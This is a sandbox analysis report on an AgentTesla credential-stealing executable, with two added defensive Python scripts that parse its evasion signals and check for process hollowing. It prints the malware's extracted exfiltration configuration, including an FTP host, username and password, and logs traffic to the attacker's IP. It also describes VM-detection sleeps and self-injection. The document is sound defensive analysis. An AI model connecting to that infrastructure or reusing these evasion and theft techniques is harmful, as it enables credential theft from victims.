
Windows Analysis Report
Q4YODvoYjL.exe

Overview

General Information

Sample Name: Q4YODvoYjL.exe
Original Sample Name: e30c67b19383f259d7414b763049eb2f.exe
Analysis ID: 830848
MD5: e30c67b19383f259d7414b763049eb2f
SHA1: 8a1465b73066cf8642d39c9ef2333d8361e9d177
SHA256: 182086eeecf6f1b4dc82a040a476d947759556513ad63c129604c565cd06cdc3
Tags: AgentTesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • Q4YODvoYjL.exe (PID: 576 cmdline: C:\Users\user\Desktop\Q4YODvoYjL.exe MD5: E30C67B19383F259D7414B763049EB2F)
    • Q4YODvoYjL.exe (PID: 352 cmdline: C:\Users\user\Desktop\Q4YODvoYjL.exe MD5: E30C67B19383F259D7414B763049EB2F)
  • cleanup
{"Exfil Mode": "FTP", "Host": "ftp://ftp.valvulasthermovalve.cl", "Username": "cva19491@valvulasthermovalve.cl", "Password": "LILKOOLL14!!"}
Source | Rule | Description | Author | Strings
00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: Q4YODvoYjL.exe PID: 352 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: Q4YODvoYjL.exe PID: 352 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
          No Sigma rule has matched
Timestamp: 03/20/23-18:32:35.384138
Source IP: 192.168.2.5
Destination IP: 190.107.177.239
SID: 2851779
Source Port: 49700
Destination Port: 54926
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 03/20/23-18:32:35.159386
Source IP: 192.168.2.5
Destination IP: 190.107.177.239
SID: 2029927
Source Port: 49699
Destination Port: 21
Protocol: TCP
Classtype: A Network Trojan was detected


          AV Detection

Source: Q4YODvoYjL.exe | ReversingLabs: Detection: 30%
Source: Q4YODvoYjL.exe | Virustotal: Detection: 38%
Source: http://ftp.valvulasthermovalve.cl | URL Reputation: Label: phishing
Source: ftp.valvulasthermovalve.cl | Virustotal: Detection: 13%
Source: Q4YODvoYjL.exe | Joe Sandbox ML: detected
Source: 0.2.Q4YODvoYjL.exe.3fd4f10.8.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.valvulasthermovalve.cl", "Username": "cva19491@valvulasthermovalve.cl", "Password": "LILKOOLL14!!"}
Source: Q4YODvoYjL.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.5:49698 version: TLS 1.2
Source: Q4YODvoYjL.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: kmTG.pdb source: Q4YODvoYjL.exe
          Source: Binary string: kmTG.pdbSHA256vL source: Q4YODvoYjL.exe

          Networking

Source: Traffic | Snort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.5:49699 -> 190.107.177.239:21
Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49700 -> 190.107.177.239:54926
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | DNS query: name: api.ipify.org
Source: Joe Sandbox View | ASN Name: SOCCOMERCIALWIRENETCHILELTDACL SOCCOMERCIALWIRENETCHILELTDACL
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | IP Address: 190.107.177.239 190.107.177.239
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
Source: global traffic | TCP traffic: 192.168.2.5:49700 -> 190.107.177.239:54926
Source: unknown | FTP traffic detected: 190.107.177.239:21 -> 192.168.2.5:49699 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 3 of 100 allowed. 220-Local time is now 14:32. Server port: 21. 220-This is a private system - No anonymous login 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity.
Source: unknown | Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49698
Source: Q4YODvoYjL.exe, 00000001.00000002.562716771.0000000000C96000.00000004.00000020.00020000.00000000.sdmp, Q4YODvoYjL.exe, 00000001.00000003.352966359.0000000000C92000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: Q4YODvoYjL.exe, 00000001.00000002.563968449.0000000002A6C000.00000004.00000800.00020000.00000000.sdmp, Q4YODvoYjL.exe, 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ftp.valvulasthermovalve.cl
Source: Q4YODvoYjL.exe, 00000001.00000002.563968449.00000000029F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: Q4YODvoYjL.exe, 00000001.00000002.563968449.00000000029F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: Q4YODvoYjL.exe, 00000001.00000002.563968449.00000000029F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: unknown | DNS traffic detected: queries for: api.ipify.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.5:49698 version: TLS 1.2
Source: Q4YODvoYjL.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 0_2_011EC844
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 0_2_011EF1F8
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 0_2_011EF1E8
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_00D7A8F8
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_00D7C8B8
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_00D79CE0
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_00D7A028
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_00D759E3
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_00D77F0B
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_0538C78C
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_0538F5B1
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_0538C780
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_0538AA70
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_0538D850
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_06606258
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_06605288
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_06600040
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_0660B8A8
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_06601968
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_06608840
Source: Q4YODvoYjL.exe, 00000000.00000002.355813847.00000000071C0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCruiser.dll, vs Q4YODvoYjL.exe
Source: Q4YODvoYjL.exe, 00000000.00000000.297927431.00000000008D8000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamekmTG.exe> vs Q4YODvoYjL.exe
Source: Q4YODvoYjL.exe, 00000000.00000002.356622503.0000000007480000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameOutimurs.dll2 vs Q4YODvoYjL.exe
Source: Q4YODvoYjL.exe, 00000000.00000002.344107634.0000000002C87000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCruiser.dll, vs Q4YODvoYjL.exe
Source: Q4YODvoYjL.exe, 00000000.00000002.344107634.0000000002C87000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename8ca78997-7490-4fc7-ba81-45e30d020943.exe4 vs Q4YODvoYjL.exe
Source: Q4YODvoYjL.exe, 00000000.00000002.344107634.0000000002D17000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCruiser.dll, vs Q4YODvoYjL.exe
Source: Q4YODvoYjL.exe, 00000000.00000002.346823897.0000000003C49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameOutimurs.dll2 vs Q4YODvoYjL.exe
Source: Q4YODvoYjL.exe, 00000000.00000002.346823897.0000000003FA7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename8ca78997-7490-4fc7-ba81-45e30d020943.exe4 vs Q4YODvoYjL.exe
Source: Q4YODvoYjL.exe, 00000001.00000002.562654629.00000000007E8000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Q4YODvoYjL.exe
Source: Q4YODvoYjL.exe, 00000001.00000002.562504272.000000000042C000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilename8ca78997-7490-4fc7-ba81-45e30d020943.exe4 vs Q4YODvoYjL.exe
Source: Q4YODvoYjL.exe | Binary or memory string: OriginalFilenamekmTG.exe> vs Q4YODvoYjL.exe
Source: Q4YODvoYjL.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Q4YODvoYjL.exe | ReversingLabs: Detection: 30%
Source: Q4YODvoYjL.exe | Virustotal: Detection: 38%
Source: Q4YODvoYjL.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\Q4YODvoYjL.exe C:\Users\user\Desktop\Q4YODvoYjL.exe
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Process created: C:\Users\user\Desktop\Q4YODvoYjL.exe C:\Users\user\Desktop\Q4YODvoYjL.exe
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Q4YODvoYjL.exe.log
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/2
Source: Q4YODvoYjL.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: Q4YODvoYjL.exe | Binary or memory string: g.slN
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Q4YODvoYjL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Q4YODvoYjL.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Q4YODvoYjL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: kmTG.pdb source: Q4YODvoYjL.exe
          Source: Binary string: kmTG.pdbSHA256vL source: Q4YODvoYjL.exe
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 0_2_011ECB36 pushfd ; ret
Source: initial sample | Static PE information: section name: .text entropy: 7.867913508227014
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe TID: 472 | Thread sleep time: -40023s >= -30000s
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe TID: 4320 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe TID: 1352 | Thread sleep count: 461 > 30
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Window / User API: threadDelayed 461
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Thread delayed: delay time: 40023
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Thread delayed: delay time: 922337203685477
          Source: Q4YODvoYjL.exe, 00000001.00000003.352966359.0000000000C68000.00000004.00000020.00020000.00000000.sdmp, Q4YODvoYjL.exe, 00000001.00000002.562716771.0000000000C77000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Memory allocated: page read and write | page guard
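          The evasion lines above, read programmatically. This is an added example and is not part of the Joe Sandbox report or of the sample's own code. It parses the report's own lines (copied below as constructed sample input, in the fused form the raw export produces) and makes three things explicit: which WMI classes the sample enumerates (Win32_BaseBoard, Win32_Processor and Win32_NetworkAdapterConfiguration expose manufacturer, CPU and adapter strings that name the hypervisor); that the reported delay 922337203685477 is exactly what Int64.MaxValue 100-ns ticks comes to in milliseconds, so whatever unit the label prints it is a timer that never expires rather than a genuine wait; and that the 461-iteration sleep loop is the cheap way to run out a sandbox clock. The "Hyper-V RAW" string is scored low here because it is the Winsock catalog name of the Hyper-V socket provider that ships with stock Windows 10. The VM-fingerprint class list, the thresholds and the bucket names are this example's own choices.

```python
"""Added example (not from the Joe Sandbox report or the sample): parse the
behaviour lines of the "Malware Analysis System Evasion" block and reduce them
to the evasion facts a triager needs. Thresholds, class list and labels are
this example's own assumptions."""
import re

# Report lines copied from the section above (constructed sample input). The raw
# export fuses the source column onto the signal name; the regex tolerates both
# the fused form and a " | " separated form.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\Q4YODvoYjL.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration",
    r"Source: C:\Users\user\Desktop\Q4YODvoYjL.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard",
    r"Source: C:\Users\user\Desktop\Q4YODvoYjL.exe TID: 472Thread sleep time: -40023s >= -30000s",
    r"Source: C:\Users\user\Desktop\Q4YODvoYjL.exe TID: 4320Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Users\user\Desktop\Q4YODvoYjL.exe TID: 1352Thread sleep count: 461 > 30",
    r"Source: C:\Users\user\Desktop\Q4YODvoYjL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor",
    r"Source: Q4YODvoYjL.exe, 00000001.00000003.352966359.0000000000C68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll",
]

SIGNALS = ("WMI Queries", "Thread sleep time", "Thread sleep count",
           "Thread delayed", "Window / User API", "Binary or memory string",
           "Process token adjusted", "Memory allocated")

LINE_RE = re.compile(
    r"^Source:\s*(?P<source>.+?)(?:\s+TID:\s*(?P<tid>\d+))?\s*\|?\s*"
    r"(?P<signal>" + "|".join(re.escape(s) for s in SIGNALS) + r"):\s*(?P<detail>.*)$"
)

# WMI classes whose Manufacturer / Product / Name fields reveal VMware,
# VirtualBox, Hyper-V, QEMU etc. (assumed list for this example).
VM_FINGERPRINT_CLASSES = {
    "Win32_BaseBoard", "Win32_Bios", "Win32_ComputerSystem", "Win32_Processor",
    "Win32_NetworkAdapterConfiguration", "Win32_NetworkAdapter",
    "Win32_VideoController", "Win32_DiskDrive",
}

# Int64.MaxValue 100-ns ticks expressed in milliseconds: the largest interval an
# NtDelayExecution-style wait can carry, i.e. a delay that never fires.
INFINITE_DELAY_MS = (2**63 - 1) // 10_000   # 922337203685477
LONG_SLEEP_MS = 30_000                      # the report's own >= -30000 threshold


def parse_line(line: str):
    """Split one report line into source / tid / signal / detail, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["tid"] = int(rec["tid"]) if rec["tid"] else None
    return rec


def classify_sleep(ms: int) -> str:
    """Bucket a reported delay by magnitude. The sign is dropped because the
    report prints the negative relative interval exactly as the call passed it."""
    ms = abs(ms)
    if ms >= INFINITE_DELAY_MS:
        return "infinite"
    if ms >= LONG_SLEEP_MS:
        return "long"
    return "short"


def summarize(lines):
    """Reduce raw report lines to the evasion facts a triager needs."""
    wmi, sleeps, loop_counts, weak_strings = set(), [], [], []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        sig, detail = rec["signal"], rec["detail"]
        if sig == "WMI Queries":
            wmi.update(re.findall(r"Win32_\w+", detail))
        elif sig == "Thread sleep time":
            sleeps.append(int(re.match(r"-?(\d+)", detail).group(1)))
        elif sig == "Thread sleep count":
            loop_counts.append(int(re.match(r"(\d+)", detail).group(1)))
        elif sig == "Binary or memory string" and "Hyper-V RAW" in detail:
            # Winsock catalog name of the Hyper-V socket provider; present on
            # stock Windows 10, so low confidence on its own.
            weak_strings.append("Hyper-V RAW")
    return {
        "vm_fingerprint_classes": sorted(wmi & VM_FINGERPRINT_CLASSES),
        "other_wmi_classes": sorted(wmi - VM_FINGERPRINT_CLASSES),
        "sleep_buckets": sorted({classify_sleep(s) for s in sleeps}),
        "max_sleep_loop": max(loop_counts, default=0),
        "weak_vm_strings": weak_strings,
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LINES).items():
        print(f"{key}: {value}")
```

          Run against the seven lines above it reports the three fingerprinting classes, an "infinite" and a "long" sleep bucket, a 461-iteration loop and the one weak string; the same function takes a whole exported report, which is the practical use.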

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Memory written: C:\Users\user\Desktop\Q4YODvoYjL.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Process created: C:\Users\user\Desktop\Q4YODvoYjL.exe C:\Users\user\Desktop\Q4YODvoYjL.exe
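          What the two flagged lines encode, as an added example that is not code from the report or from the sample: the writer places a buffer beginning 4D 5A ("MZ") at 0x400000 inside a freshly created copy of itself, which is the process-hollowing (RunPE) layout. The function below performs the header check such a signature relies on, bounds-checking every PE offset so a partial write cannot raise, and additionally reads the optional header's ImageBase to tell a write at the image's own preferred base from a relocated one. The minimal PE32 header is constructed for the demo; the field offsets follow the PE format, and the result labels are this example's own.

```python
"""Added example (not from the Joe Sandbox report or the sample): validate a
cross-process write at a target's image base as a PE image and label it the
way the "Memory written ... value starts with: 4D5A" signature does. The
header bytes are constructed; labels are this example's own."""
import struct

IMAGE_DOS_SIGNATURE = b"MZ"            # 4D 5A
IMAGE_NT_SIGNATURE = b"PE\x00\x00"
IMAGE_FILE_MACHINE_I386 = 0x014C
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def parse_pe_header(buf: bytes):
    """Return (machine, image_base, entry_rva) if buf begins with a well-formed
    PE header, else None. Every offset is bounds-checked first."""
    if len(buf) < 0x40 or buf[:2] != IMAGE_DOS_SIGNATURE:
        return None
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if e_lfanew + 24 > len(buf) or buf[e_lfanew:e_lfanew + 4] != IMAGE_NT_SIGNATURE:
        return None
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, _, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", buf, e_lfanew + 4)
    opt = e_lfanew + 24                     # start of IMAGE_OPTIONAL_HEADER
    if opt_size < 32 or opt + 32 > len(buf):
        return None
    magic = struct.unpack_from("<H", buf, opt)[0]
    entry = struct.unpack_from("<I", buf, opt + 16)[0]   # AddressOfEntryPoint
    if magic == PE32_MAGIC:
        image_base = struct.unpack_from("<I", buf, opt + 28)[0]
    elif magic == PE32PLUS_MAGIC:
        image_base = struct.unpack_from("<Q", buf, opt + 24)[0]
    else:
        return None
    return machine, image_base, entry


def classify_write(writer_exe: str, target_exe: str, base: int, buf: bytes) -> str:
    """Label a cross-process write at `base` in `target_exe` made by `writer_exe`."""
    hdr = parse_pe_header(buf)
    if hdr is None:
        return "not_pe"
    machine, image_base, _ = hdr
    arch = "x86" if machine == IMAGE_FILE_MACHINE_I386 else f"machine_{machine:#x}"
    if image_base != base:
        # PE dropped somewhere other than its preferred base: relocations needed.
        return f"pe_{arch}_relocated"
    if writer_exe.lower() == target_exe.lower():
        # Same image writes a PE into a child copy of itself at the child's own
        # base: the self-hollowing pattern the two report lines describe.
        return f"pe_{arch}_self_hollowing"
    return f"pe_{arch}_injected"


def build_demo_pe32(image_base: int = 0x400000) -> bytes:
    """Constructed minimal PE32 header (headers only, no sections) for the demo."""
    dos = bytearray(0x40)
    dos[:2] = IMAGE_DOS_SIGNATURE
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew: NT headers follow DOS header
    file_hdr = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, 1, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)                              # standard PE32 optional header size
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 16, 0x1000)           # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, image_base)       # ImageBase
    return bytes(dos) + IMAGE_NT_SIGNATURE + file_hdr + bytes(opt)


if __name__ == "__main__":
    exe = r"C:\Users\user\Desktop\Q4YODvoYjL.exe"
    payload = build_demo_pe32()
    print(payload[:2].hex().upper())                  # 4D5A, as in the report line
    print(classify_write(exe, exe, 0x400000, payload))
```

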